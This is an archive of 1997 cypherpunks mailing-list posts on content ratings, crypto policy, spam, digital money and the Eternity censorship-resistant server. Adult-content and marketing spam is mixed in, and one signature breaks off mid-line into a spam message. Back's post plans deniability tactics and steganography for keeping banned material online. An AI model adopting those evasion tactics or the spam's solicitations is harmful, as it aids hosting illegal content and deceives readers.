WOW-COM(TM) is insightful: CTIA�s unbiased analysis 
WOW-COM(TM) is beneficial: Find products and services in  WOW-COM(TM)'s Virtual 
Trade Show.   List open positions in the WOW-COM(TM) Career Center, get resumes 
via email, and hire qualified individuals.

The world of wireless is in constant motion.  Stay on top of the news and benefit from CTIA�s analysis by reading WOW-COM(TM) everyday.  You may remove yourself from the WOW-COM(TM) mailing list by going to http://www.wow-com.com/unsubscribe
========================================================

This update sponsored by: IBM
http://www.wow-com.com/professional/systemint/

Today, more than ever, wireless carriers must remain flexible and respond rapidly to changing market conditions. Your success will depend on understanding your strategic opportunities and threats and quickly responding to them. To accomplish this, a wireless carrier must build links  that are sophisticated, comprehensive and flexible. This is no small endeavor. IBM has developed a general multilevel blueprint of a wireless company to assist wireless carriers pursuing this goal. Take a look at how we can help you achieve your goals.








From announce at lists.zdnet.com  Tue Aug  5 20:50:03 1997
From: announce at lists.zdnet.com (announce at lists.zdnet.com)
Date: Wed, 6 Aug 1997 11:50:03 +0800
Subject: Attend Windows NT Intranet Solutions!
Message-ID: 



-----------------------------------------------------------------
   ZDNET ANNOUNCEMENT          8/6/97
-----------------------------------------------------------------
Are you looking to evaluate the latest Windows NT products?
Attend Windows NT Intranet Solutions August 11-15.

What:       Windows NT Intranet Solutions August 11-15
Where:      Moscone Center -- San Francisco, CA
When:       August 11-15

Windows NT Intranet Solutions, the NT Event, features a conference
and expo program focused on all the major NT issues:

  -  Integrating Unix/NetWare and NT
  -  Migrating applications to NT
  -  NT scalability and clustering
  -  Managing and securing NT networks and much more.

The expert-led Conference program, co-sponsored by PC WEEK,
Inter at ctive Week and Windows Sources, runs August 11-15 and the
3-day Expo, featuring all the leading vendors and the latest NT 
products and solutions, runs August 13-15.

To register free for the Expo and get complete conference info, 
call (888)800-8920 or visit the Windows NT Intranet Solutions 
on the Web at:

http://www.wintis.com

Windows NT Intranet Solutions is presented by SOFTBANK Forums, 
the producers of NetWorld+Interop and Seybold Seminars.

_______________________________________________________________
ZDNet Announcements are periodic notices of new features,
special events and free offers available to members of ZDNet.

 --To subscribe to ZDNet Announcements, please send mail to:
announce-on at lists.zdnet.com
You can leave the subject and body blank.

 --To unsubscribe to ZDNet Announcements, please send mail to:
announce-off at lists.zdnet.com
You can leave the subject and body blank.
_______________________________________________________________
Powered by Mercury Mail: http://www.merc.com






From cindy at mail1.mail-prom.com  Wed Aug  6 12:14:04 1997
From: cindy at mail1.mail-prom.com (cindy at mail1.mail-prom.com)
Date: Wed, 6 Aug 1997 12:14:04 -0700 (PDT)
Subject: adults only
Message-ID: <747743774MAIL-PROMO.COM>


TRY US OUT FOR FREE!!!
See and talk to a live person on your computer screen.
Not a video!  Not prerecorded!  This is live!!!
Our models will obay your every cummand, we're willing to prove it
by giving you a free 5 minute preview.
Give it a try, it's free!
  - CLICK HERE






From apache at bear.apana.org.au  Tue Aug  5 21:57:30 1997
From: apache at bear.apana.org.au (Apache)
Date: Wed, 6 Aug 1997 12:57:30 +0800
Subject: Costitutional Crisis
Message-ID: <199708060450.OAA01177@bear.apana.org.au>



5 Aug 1997 
==========  

Canberra AUSTRALIA

The High Court of Australia in a land mark case today found that
billions of dollars of taxes imposed every year on fuel, alcohol and
tabacco which increases the prices of these products by up to several
hundred percent were illegal and unconstitutional.

The court found that the states had no legal right under the
constitution to impose such taxes.

The federal government has offered to help the states collect the
revenue and pass it back to the states by way of grants. Calls have
been made for the imposition of consumption taxes to replace the lost
revenue.

None of the state premiers made any comments regarding the return of
the multi-billions in illegally collected assets to taxpayers.

The illegal taxes continue to be collected even after the High Courts
ruling.

The finding has resulted in some panicing state premiers saying the
High Court seemed to be intent on making the states ungovernable.

The federal government worried about the possibility that taxpayers
could  sue the states for repayment of mult-billions of dollars in
unconstitutionally collected taxes has announced it plans to
introduce a 100% 'Unjust Windfall Tax' to confiscate the proceeds of
winning claims. Legal experts believe such action by the federal
government may in itself may be in breach of the constitution.

--
Death to Tyrants
Help Austalians re-instate the constitution








From vznuri at netcom.com  Tue Aug  5 22:47:44 1997
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 6 Aug 1997 13:47:44 +0800
Subject: "A new battle over keeping the Net clean," by J.Weber/LATimes
In-Reply-To: 
Message-ID: <199708060531.WAA19064@netcom9.netcom.com>




DM, JW, *please* get more info on PICS. in the early stages of its
development, many people were interested in using the rating
system to rate *cool* pages. that is, the same system could be
used to point to neat content and help people navigate. therefore,
your examples always involving censorious groups like the
"christian coalitian" is highly misleading. have you heard
of the "point communications" awards, surely? such a system
would benefit immensely from the standardization of ratings that
PICS is trying to achieve..


I urge all rabid libertarians to get a clue about what the
rating systems are actually trying to accomplish.



>From: Jonathan Weber 
>To: Declan McCullagh 
>Subject: ratings story
>
>
>Innovation/ Jonathan Weber 
> 
>A New Battle   Over Keeping   the Web Clean   
>
>   On one side are the big, mainstream Internet and computer companies, 
>led by America Online and Microsoft, which proclaim their eagerness to 
>make cyberspace "safe for families.'' Lining up against them are 
>free-speech advocates, including the American Civil Liberties Union and 
>the American Library Assn., which see ratings systems as censorship 
>tools. 

this is a silly us vs. them characterization for simpleminds of a much
more complex issue. there are no clearly defined sides and it's not
a war.

>""Ratings systems are developed to enable one individual to exercise 
>control over what another person sees,'' says Marc Rotenberg, director of 
>the Electronic Privacy Information Center. That might be OK for parents 
>and their children, he allows, but such a tool will inevitably be used by 
>public institutions and governmentsif not here then abroadto restrict 
>speech. 

not if the constitution is valid in our own country. let's cross that
bridge when the government comes to it. no reason to spread fear,
uncertainty, and doubt over something that's not happened.

>   An even bigger worry is that what's being sold as a voluntary system 
>that will include a multiplicity of ratings systems is actually going to 
>be an all-but-mandatory system that offers very few choices. 

worry, worry, fear, fear. same as with CDA. just as baseless in
the long run.

>   Consider, first of all, what happens to Web sites that decline to rate 
>their pages. Any PICS-based filter would have to block all unrated pages. 

bzzzzzzzzzzzzt. those that use the filters are free to configure them
how they want. virtually all the filtering software allows different
levels of security. one can often treat the bad rating as merely an
advisory warning.

>Already, ratings proponents are calling on the major search services, 
>such as Yahoo, not to index unrated sites.

who is calling for this? PICS was designed with the idea that many
ratings would be by third-parties. I don't think self-ratings are 
going to be that common on the net, and its really absurd for anyone
to pretend there is going to be a major pressure on anyone to
"rate" their sites.   who are these nameless advocates? where is
the data? this article is about nothing but baseless speculation.

 Overseas Web services would 
>face the choice of adopting a U.S. labeling system or forgoing access to 
>any U.S. readers. Web publishers that didn't want to participate might 
>suddenly find themselves in a deserted backwater of the network. 

yes, one can create all kinds of scary scenarios when you have a teeny
brain that is overcome with fright over the slightest new situation in
life. 

>   There's also the question of how disputes over ratings would be 
>arbitrated. Sites would be self-rated, and in fact the vast majority of 
>sites would have no incentive to misrepresent themselves. But what 
>happens when some do anyway? Would it be a crime for a porn site to 
>proclaim itself suitable for children? 

SELF RATINGS are not the main use of ratings. ratings mostly make
sense with THIRD PARTIES doing the rating. there is no such thing
as "misrepresentation". who is it that thinks everything is going
to be "self rated"? whoever does is missing the essential
THIRD PARTY ASPECT that is designed into the core of PICS.

>   At the moment, moreover, it doesn't appear that there are a variety of 
>ratings systems under development representing different values. In fact, 
>a system being created by the Recreational Software Advisory Council, a 
>Microsoft-led industry group, is quickly emerging as a de facto standard. 

so what?

>   The battles over how RSAC handles certain kinds of sites have only 
>just begun, but to see the inevitable problems one need look no further 
>than the ongoing discussion about news. 

"battles, fights"-- the mentality of the person who wrote this is clear.
where is this fighting going on ? who are the people? I haven't seen
any fights except a lot of fearmongering in cyberspace over completely
hypothetical situations.

>N   ews sites, reasonably enough, don't want to rate     themselves. At 
>the very least it would be impractical to label every page of a big news 
>site every day to warn of violent or tasteless or otherwise disturbing 
>content. And labeling news just doesn't seem very consistent with freedom 
>of the press. 

SELF RATING is not going to be a major use of ratings. existing 
filtering software rarely works through SELF RATING. whoever focuses
on SELF RATING relative to the rating systems doesn't have a clue about
the major use of the technology.

>   So the news organizations want to have a special news rating. Who 
>qualifies for a news rating? Well, a committeeoperating under the 
>auspices of the Internet Content Coalition, which represents a number of 
>major publishers (including The Times)would decide. News organizations 
>get together to decide who is and who isn't a news organization. Hmm. 

bzzzzzzzzzzzt. anyone is free to rate anything. this coalition can get
together and rate anything they want right now. PICS does not change
that. it only gives a way for users who CHOOSE TO to access those
ratings and integrate them with their browsers.

>   In the face of these objections, the Clinton administration and the 
>companies backing the ratings effort say that, first of all, something 
>has to be done to stave off new legislation. If industry doesn't act, 
>Congress will come up with "son of CDA,'' and this time it might hold up 
>in court. 

the earth might stop rotating tomorrow, too. why is it that we have
a constitution but we don't believe in it? that those who scream the
loudest about constitutional violations are those that are least likely
to believe in it?

>   And that is the nightmare of free-speech advocates: that a medium that 
>the Supreme Court declared ought to be treated at least as liberally as 
>print (ever heard of ratings for books?) will nonetheless be driven into 
>TV-like conformity. 

absurd.

>This is a legitimate fear.

especially if you like to engage in fearmongering.

>   PICS and RSAC have powerful forces behind them and stand a good chance 
>of establishing themselves as part of the mainstream Internet.

they represent DECENTRALIZED control at the heart, as anyone with half
a brain can recognize..






From stewarts at ix.netcom.com  Tue Aug  5 23:56:53 1997
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Wed, 6 Aug 1997 14:56:53 +0800
Subject: Clinton's threat of line-item veto affect crypto bill?
In-Reply-To: <199708042336.QAA00471@ohio.chromatic.com>
Message-ID: <3.0.2.32.19970805100040.0077fe24@popd.ix.netcom.com>



At 04:36 PM 8/4/97 -0700, Ernest Hua wrote:
>Does anyone have any idea whether Clinton's threat of using the
>line-item veto against portions of the big spending bill could
>be leverage against some pro-SAFE legislators?

The line item veto doesn't eliminate the political games in the budget,
it just changes the details a bit.  Sure, he could threaten to
veto their favorite pork-barrel projects for crossing him on crypto,
just as he could threaten to veto them if they don't support
his favorite pork.  But as someone else said, he can threaten to
veto the crypto bill itself, or (perhaps worse) threaten to veto it
unless it's "balanced", by including controls on domestic cryptography
in return for letting Big Business export more products.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From dlv at bwalk.dm.com  Wed Aug  6 00:05:17 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Aug 1997 15:05:17 +0800
Subject: JYA Up
In-Reply-To: <1.5.4.32.19970806003415.00689254@pop.pipeline.com>
Message-ID: 



John Young  writes:

> AOL/PrimeHost has reactivated JYA.
>
> AOL's story for the takedown is that our seldom used ftp
> component was being used by unidentified parties to traffic in
> warez and that it had nothing to do with the http part, "whose
> content does not concern us."
>
> Still, it's odd we did not get a call about the problem as was done
> a few weeks ago for a similar warez invasion. At that time, we
> offered to close our ftp, but the PrimeHost rep said no, we'll monitor
> it, as we do other ftps. I specifically asked to be notified if it
> happened again, but wasn't. And it's not clear why it took a
> week for me to find out what was what. Or why not AOL did not
> just close the ftp and leave the http operating.
>
> 'Course, maybe the  takedown was signal of distrust of JYA
> innocence. And a warning.
>
> Thanks to the folks who offered more help than the teapot
> tempest seems to have warranted -- so far.

Sounds like bullshit.

I urge you to find a more honorable upstream provider.
Preferrably someone who gets connectivity off of AGIS, who doesn't
censor content.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From vznuri at netcom.com  Wed Aug  6 00:13:51 1997
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 6 Aug 1997 15:13:51 +0800
Subject: spam-- a technological solution/proposal
Message-ID: <199708060608.XAA22391@netcom9.netcom.com>



for a long time conversation here has covered the possibility of 
"certificates" especially the cryptography and algorithms behind
them. also, spam is a frequent topic. in fact I think the term
"spam" was used on this mailing list almost before anywhere else.

at the heart, spam is a fascinating question. the internet has
been designed to survive a nuclear war through its decentralization,
i.e. a threat from without. but what about a "threat from within"
such that your own nodes can be corrupted? this is the case with
spammers. it's an extremely difficult question to solve, and involves
concepts like a body, "immune system", cancer, etc.

after thinking about it for many moons, here is an interesting idea that I 
think could work on "spam prevention" using certificates. it's 
somewhat decentralized and has other nice "cyberspace friendly" features.

a "spam-free certifying agency" is started. this is essentially
a web site that allows people to download "spam-free certification".
it parcels out new digital signatures to anybody who asks.

the system works simply as follows: a person is spam-free until 
"the net" complains otherwise. the agency decides what threshold
of complaints constitutes a loss of "spam-free certification". 
when it revokes a certificate, it sends out the revocation to
the net.

you'd need something like the DNS system today to carry all the
spam-free certificates in a distributed fashion. everyone who
reads their mail can have automated checkers that throw out 
mail from non "spam-free" certified emailers.  this system requires
people to put their spam-free certificates in their mail.

the idea is that spammers could get intially certificates, but that 
complaints would be so numerous and so immediate that they couldn't get out 
that many letters before they lost their certification due to everyone
immediately complaining.

another interesting approach would be for internet providers not to allow
too many mails to be sent after a new spam-free certification of a 
new email address. that is, tie in the email addresses themselves to
the spam-prevention system.

interestingly many of these ideas are similar to the credit-reporting
agency techniques. you can get credit after you get a credit history.
the more history, the more credit. perhaps a system that limited the
amount of mail a person could send based on a "spam free history" 
could work well.

I think you could have a system that had multiple spam-free
certification agencies. you could have standards that try to juggle
among multiple agencies and certificate schemes. a variety of schemes
is better than none.

of course, all the usual caveats apply here. it's patently obvious
this system could be misused and manipulated. however I believe it's
the most promising route of anything that's been tried. I personally
think legislative/litigation solutions are a waste of time and potentially
harmful. if anyone would like to help develop this, please send me
email.







From rdl at mit.edu  Wed Aug  6 00:32:31 1997
From: rdl at mit.edu (Ryan Lackey)
Date: Wed, 6 Aug 1997 15:32:31 +0800
Subject: distributed data store, a la eternity
Message-ID: <199708060720.DAA17656@the-great-machine.mit.edu>

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL: 

From nobody at REPLAY.COM  Wed Aug  6 01:15:54 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 6 Aug 1997 16:15:54 +0800
Subject: "Please get more info on PICS"
Message-ID: <199708060712.JAA23357@basement.replay.com>



"Vladimir Z. Nuri" wrote:

> DM, JW, *please* get more info on PICS. in the early stages of its
> development, many people were interested in using the rating
> system to rate *cool* pages. that is, the same system could be
> used to point to neat content and help people navigate. therefore,
> your examples always involving censorious groups like the
> "christian coalitian" is highly misleading. have you heard
> of the "point communications" awards, surely? such a system
> would benefit immensely from the standardization of ratings that
> PICS is trying to achieve..
> 
> I urge all rabid libertarians to get a clue about what the
> rating systems are actually trying to accomplish.

There's a similar debate about whether "guns kill people" or "people
kill people"[*].  Although it's the repressive regime that actually
causes the supression, the widespread availability of rating systems
makes it easier for them to do so.

Although the PICS rating system permits diverse rating systems, in
practice the oligopoly in the browser market confines this to the
value system of the ruling elite (unquote).  Notably, the current
RSACi rating system makes no distinction between consenting sex in
marriage and paedophilia: both earn a Sex-4 rating.  Probably many
people feel the first is more acceptable than the second, but they
have no way to express this in current PICS implementations.
(http://www.rsac.org/rating_description.html)

::Boots

[*] The correct answer, by the way, is "politicians kill people"






From rdl at mit.edu  Wed Aug  6 01:23:42 1997
From: rdl at mit.edu (Ryan Lackey)
Date: Wed, 6 Aug 1997 16:23:42 +0800
Subject: spam-- a technological solution/proposal
Message-ID: <199708060812.EAA17863@the-great-machine.mit.edu>

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL: 

From rah at shipwright.com  Wed Aug  6 16:58:57 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 6 Aug 1997 16:58:57 -0700 (PDT)
Subject: Digital Money: New Era or Business as Usual?
Message-ID: 



--- begin forwarded text


Subject: Digital Money: New Era or Business as Usual?
Date: Wed, 6 Aug 97 11:11:20 +0000
x-sender: daveb at mail.hyperion.co.uk
From: "David G.W. Birch" 
To: "Bob Hettinga" 
Mime-Version: 1.0

Bob,

Please repost to e$ and anywhere else you think it might go down well!
The speaker line up is excellent so I'm hoping we can drum up some extra
business by showing it off!!


Digital Money: New Era or Business as Usual?

London, England, 7th-8th October 1997

Hyperion are co-sponsors of a two day seminar bringing together leaders
in the field of digital money and online trading. The seminar is
organised by Unicom  in association with Lotus,
NCR, Computer Associates, Attachmate, IMIS, Automatic ID News, British
Computer Society and the Institute of Management Consultants.

The seminar cost UKP 845 plus VAT where applicable and places should be
booked through Unicom.

Opening Address: Digital Money Directions
David G.W. Birch, Director, Hyperion.

Keynote Address: Monetary Innovation in Historical Perspective
Glyn Davies, Professor Emeritus and economic advisor to Julian Hodge Bank
Ltd. A copy of Glyn's excellent book "A History of Money from Ancient
Times to the Present Day" will be presented free to all delegates with
the compliments of Hyperion.

Digital Money and Laissez-Faire Banking
David Cronin, formerly with Bank of Ireland.

Digital Money Liability
Nick Lockett, Field Fisher Waterhouse.

Why is the Electronic Economy Different?
John Browning (edited Wired UK).

Programmable Currenies
Howard Smith, CSC

Is the Book Entry Transaction Dead?
Bob Hettinga, Digital Commerce Society of Boston

Trading in the Internet Financial System
Ian Grigg, Systemics

The Electronic Purse in Context
Peter Hirsch, Retail Banking Research

Mondex, A Status Report
Steve Maier, Mondex International

E-Cash, GSM and the Net
Julian Wilson, AT&T Unisource

Electronic Purse: the lessons so far
Steve Johnson, Verifone

Getting from Real Money to Electronic Money
Robert Zipplies, DigiCash

Micropayments
Peter Kirby, IBM

The Cybercash Solution Set
Steve Crispinelli, Cybercash

The Millicent Scheme
Henry Gouraud, Digital UK.

------------------------------------------------------------------
David G.W. Birch, Director.      Hyperion, 8 Frederick Sanger Road
http://www.hyperion.co.uk/           Guildford, Surrey GU2 5YD, UK
mailto:daveb at hyperion.co.uk                  Tel:+44(0)1483 301793
Finger for my PGP public key                 Fax:+44(0)1483 561657

Where people, networks and money come together....consult Hyperion

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From mark at unicorn.com  Wed Aug  6 04:28:30 1997
From: mark at unicorn.com (Mark Grant)
Date: Wed, 6 Aug 1997 19:28:30 +0800
Subject: Eternity Uncensorable?
Message-ID: 




Seems to me there's a fundamental flaw with the current Eternity server;
as I understand it the messages are identified by a subject which is the
SHA of their URL, so all that a government need do to censor a particular
site is to scan for those messages and issue cancels. Sure, your site and
those upstream may not accept such messages, but potentially they can
still wipe out a large fraction of the system or at least force users to
change their eternity URLs on a regular basis.

It also doesn't provide true security, since when someone sets up an 
illegal site the gubment can find the messages on Usenet, decrypt them, 
and then threaten the remailer operator who posted them.

I understand that this is just an alpha release, but I don't see any
obvious way to fix these problems with a Usenet-based system. 

	Mark






From dformosa at st.nepean.uws.edu.au  Wed Aug  6 05:01:21 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Wed, 6 Aug 1997 20:01:21 +0800
Subject: JYA Up
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 5 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> I urge you to find a more honorable upstream provider.
> Preferrably someone who gets connectivity off of AGIS, who doesn't
> censor content.

You don't get connectivity off of AGIS becuase no-one connnects.  AGIS'
routers ect are so misconfigered ect that pagets seem to move threw it
more by coninicdence then anything else.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+gq6KQK0ynCmdStAQGgTAP7BpyHaIamlA3mwEY42gL1hUxV836EtbN+
inmw58XlXSrVOckpKYyOddkv8M+CFtGP1uXr1+unhalmVENcGuLsjCrw/EEICEP1
9TgcCGhVWOerjKg8Qr9VCgutXLUcmhXlhjFzRKYT4n10UdiRq82Mx/L1Da1W/tra
7RvhE7/Igi4=
=aO0S
-----END PGP SIGNATURE-----






From aba at dcs.ex.ac.uk  Wed Aug  6 05:14:18 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Wed, 6 Aug 1997 20:14:18 +0800
Subject: distributed data store, a la eternity
In-Reply-To: <199708060720.DAA17656@the-great-machine.mit.edu>
Message-ID: <199708061206.NAA01240@server.test.net>




Ryan Lackey  writes:
> I've been looking at the current eternity server, and it's a nice
> thing, but I'm kind of convinced no system like this which does not
> allow for electronic payments for those taking the risks will be
> successful.  Perhaps I'm wrong, but I don't think so.  It takes
> money to run a secure data store.  (my current project depends upon
> secure distribued available data storage, so I've been looking into
> this for a while)

The eternity servers announced recently are experimental.  That is to
say they are designed as a vehicle for improvement.  They are not
completed systems yet.  I am most keen myself to see eternity servers
which are truly resilient; the implementation we have is a first cut.
The whole idea is for it to be improved.

As to the risks issue (being an eternity server operator might lead to
legal hassles, and therefore people need to make money to compensate),
I have three main comments on that:

1. Accepting money for activities might worsen your legal position as
   you are then personally offering services.  This issue has been
   argued about in the past in relation to the idea of having
   for-pay remailers.  I'm not legally qualified to comment on this.

2. With my design the document store is a separate distributed system
   which is now part of the landscape, and is well accepted as a home
   for all kinds of dodgy materials and discussions.  People are used
   to the fact that some alt USENET newsgroups are full of material
   which is illegal in some parts of the world.  If you start from
   scratch with a new document distribution method, your first few
   servers are easy targets, due to small numbers.  People will be
   intolerant of them, and the Feds will probably go for RICO
   conspiracy and lock all 6 up.  Game over before you start.  I agree
   that you can do much better theoretically with this model, but
   you've got to consider existing network social norms, USENET is
   part of the landscape.  You won't simultaneously manage to threaten
   all news admins in the world to close down alt groups, they are in
   too many countries, and admins will rebel, and there will be plenty left. 

   So using USENET allows you to point the finger and say "it's not my
   material, it's just USENET posts".  Much like altavista doesn't
   issue cancel messages for posts in USENET news, it's not their
   problem, they're just providing a view onto a distributed database.
   Or much like providing an open access NNTP server, or access to
   users only as done by thousands of ISPs the world over without
   ill-effect modulo localised attempts to force people to not carry
   some groups.

   Another less openly stated opinion of mine is that the way to do it
   is to start as I have, and add other document sharing channels
   later.  Keep some confusion for the observer as to where the
   material is coming from.  As long as it _might_ have come out of
   USENET news on the fly, you can use that as a cover argument.  If
   the shit hits the fan you can fall back to that.

   Probably long term I think you would want to keep USENET as 
   a fall back system, but definately keep it as the distribution
   channel (it is _the_ most secure way of delivering anonymous
   messages, where you want to protect the recipients identity:
   broadcast it).  Much better than sending mail via anonymous
   remailers.  Mixmaster is good, but not that good in the face of
   repeated posting by one individual of materials which seriously
   annoy a major government.

3. Last argument is the "good enough" argument.  If the above tactic
   of using USENET as a distribution mechanism, and having cacheing,
   and optionally charging for storage, with exchange of articles
   between servers survives censorship in practice, why bother with
   anything more complex.

   For example Ross talks about arranging it so that documents are
   reconstructed from secret shares so that individual servers don't
   know what they've served.  Well that's sexy stuff, and clearly more
   secure if you absolutely must conceal which server served what
   material, if it has definately got the material from a database
   which it owns.

   The basic threat model of my eternity server design is
   disposable nodes.  That is it's like the new low orbit satellite
   systems, the satellites fall in and burn up after a while, but it
   doesn't matter because it's part of the design to keep throwing up
   new ones often enough to ensure continuous cover.  Same for
   eternity servers.  Individuals will cave, but when they do other
   enraged netters will start some more in protest.

   Just look at the Scientologist battles.  It's simply amazing the
   bravery of the Scientologist detractors in face of types of
   harrasement thrown at them.  Despite this the Scientologists are
   losing in that their materials are all over the place.  This
   suggests to me that USENET could work just fine.

   Also there is the possibility of private eternity servers.  That is
   you have an eternity server for your own use only, or only for a
   group of friends, or only for users of your ISP.  That one won't
   come under attack, and provided USENET doesn't get censored you'll
   be ok.

   Perhaps pointing the finger at USENET will be an effective
   strategy.  Perhaps we'll find out one way or another in the next
   few months :-)  Empirical cryptography.


Now some ideas on moving towards a real Anderson Eternity Service (in
small stages, the first steps are far removed), I have several ideas
for where to go next:

a) Cache replacement policy based on number of accesses

   There is currently a cache of eternity documents.  Documents and
   servers are configurable to either cache: on, off, or encrypted.
   One solution to the question of what happens when you fill up that
   100Mb cache is to discard least accessed pages.  Popular stuff stays,
   and you have fixed storage requirements.  The mantra "Disk is cheap".
   It wouldn't kill someone these days to dedicate a 6Gb disk for an
   eternity cache.

b) Have the above cache policy augmented with pay for disk space with
   ecash storage fee included with post.  Realistically for either you
   need a way for eternity servers to ask each other for articles.
   Well they can do that easily enough via http, but you still need
   to know which servers are available.

c) Use news archival services as another database to query.  eg
   altavista, dejanews.  I am starting to think that this is not such
   a hot idea now, because it's too centralised, and the operators are
   already hostile to bloat of their archive space, and do things like
   truncate UUencoded documents, and PGP ascii armored documents already.
   I mean ok, I'm sure we could run a war of new crude stego improvements
   being countered by more advanced eternity article detectors, up until
   we get to a natural langauge looking stego encoder.  Texto is a simple
   example of one of these.

> Would anyone else be interested in working on a real reliable
> distributed data store, more like what Anderson described than the
> current Eternity server?  Specifically, something with payment
> systems built in, 

Payment is definately going to go in.  It will be necessary to control
volume somehow if it gets popular, and it allows providors to cover
their expenses.  Charging for document download might be an idea also
to cover bandwidth.

> a multiplicity of ways to pass messages from server to server, 

That has to come also, because of USENET expiring, and because of the
non-distributed nature of systems of using the news archival services
(dejanews etc).

Initial ideas are:

- have list of eternity servers, and query them randomly until you
find one which has the document.  Pro: simple solution, fast lookup,
Con: has easily accessible comprehensive list of who's running
eternity servers.

- build something in terms of remailers to allow eternity servers to
query each other anonymously.  Con: _slow_ lookup.

- build specialised DC-net or pipe net setup with eternity servers on
it.  Pro: fast lookup, harder to track who's serving what, Con: no
implementations yet, con #2 provides a fat target for distrupting,
take out the DC net/pipenet and the document exchange connectivity
fails.

- secret sharing documents over eternity servers

> and a multi-level design in which a maximum amount of anonymity is
> preserved?

One approach would be to treat anonymity as a separable issue from the
issue of hiding which server served which document (and issues of
secret sharing etc).

That is couldn't the viewer use crowds, or less securely
www.anonymizer.com.

However I think there is an opportunity to have the document
constructed by the eternity server nodes in such a way that only the
requester can reconstruct the document.  Eg each server encrypt the
share it is serving with the requesters public key.  Then only the
requester can recover the shares and hence the document.  You should
make sure it's forward secrect too.

> I'm not saying I don't like the current eternity server, just that
> I'd like to work on one with payment systems built in, 

I'm all for payment methods.  Perhaps hascash
(http://www.dcs.ex.ac.uk/~aba/hashcash/) would be a good experimental
currency to get it working with first, and then switch to real
anonymous ecash a bit later.

> and more closely following the original idea for an eternity server
> (which I thought was a great one).

I'm all for making things as resilient and crypgraphically strong as
you can.  However I think part of the reason for different opinions is
that you are addressing three issues at once:

  - non censorable document store
  - preventing people correlating material with the server which served it
  - making the users accesses anonymous

The design of my eternity server as it is at the moment trying to
address just:

  - non censorable document store

by relying on the low orbit satellite model for public access servers,
and the borrowing from the dififculty of censoring USENET news.

Mild attempts can be made to protect correlation of users with
material accessed:

  - enable ssl on the server

(Cheap solution I know, as it relies on the trustworthiness of the
operators of the server, and that the system hasn't been compromised
by hackers, and that you have possibility of MITM attack if the
servers certificate isn't authenticated, or even if it is with a more
determined long term MITM attack).

No attempt is made to prevent:

  - people correlating material with the server which served it

because that is outside the design criteria.  Who cares what they
correlate for the server.  The server is just forwarding you USENET
news articles, just like an open access NNTP server, with a bit of
reformatting.

If someone takes enough exception to that there will be plenty of
other eternity servers to take up the slack.

Please feel free to take and hack the eternity-0.08 source code, and
contribute, or hack it for your whatever purposes.

I'd be interested in any comments on this somewhat long post from
yourself, and other readers.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0


ZMaster has hired this promotional company and are not the maintainers of the email list.
Please so do not contact them for removes, just click on your |Reply Option| and type
 REMOVE in the subject line.
========================================================

We are XXX content providers to web sites
via CDROM licensing. One blanket license allows you
to put all our CD's online we have on the market now
and all future ones coming. We are in compliance with
18 USC 2257, and model releases are on file. Cheapest
way to get legal high quality hardcore images. We have
won the industry awards 2 years in a row for "Best 
Hardcore" photo CD...the 5 cd's are about 3500 XXX and
500 softcore...the newest fetish cd is at pressing house.
Release date is July 9th. Been publishing since 1992.

Once you license fee is paid...you may place all 5 of
our titles online now, and all the ones to be released
in the future for merely the cost of the CD ($20).

http://www.zmaster.com


Benefits:

a) Excellent supplemental content for your galleries.
   Stop paying $1-3 an image, pay pennies.

b) Best deal on the net for licensing in terms of $$$

c) No legal hassles, risks, or fears of copyright

d) Place it on all your URLS's once your licensed

e) No risk, 100% money back guarentee if your not 
   thrilled with the quality and variety.

f) At least 2 more productions will be released this
   year, a Gay male title with all gay talent and another
   XXX hardcore. 

h) Images are scanned from 35mm slides and were taken
   during the filming of hundreds of movies.

i) Ask us how to get  your FREE copy of Compupic to
   do your batch cropping, resizing, and adding of text
   to images - $69.95 webtools free.

j) Resell our CDROM titles for 30% commission, 
   purchase direct from us wholesale.

http://www.zmaster.com





From aba at dcs.ex.ac.uk  Wed Aug  6 06:50:17 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Wed, 6 Aug 1997 21:50:17 +0800
Subject: Eternity Uncensorable?
In-Reply-To: 
Message-ID: <199708061308.OAA02171@server.test.net>




These comments are useful, as eternity needs some documentation, and
I'm supposed to be writing an article for Phrack on this for deadline
of this sunday, and arguing with people is a good way to get
motivation to write explanations etc.  This dual purpose is why this
is a longish post.

Mark Grant  writes:
> Seems to me there's a fundamental flaw with the current Eternity
> server; as I understand it the messages are identified by a subject
> which is the SHA of their URL, 

yup.

> so all that a government need do to censor a particular site is to
> scan for those messages and issue cancels. Sure, your site and those
> upstream may not accept such messages, but potentially they can
> still wipe out a large fraction of the system or at least force
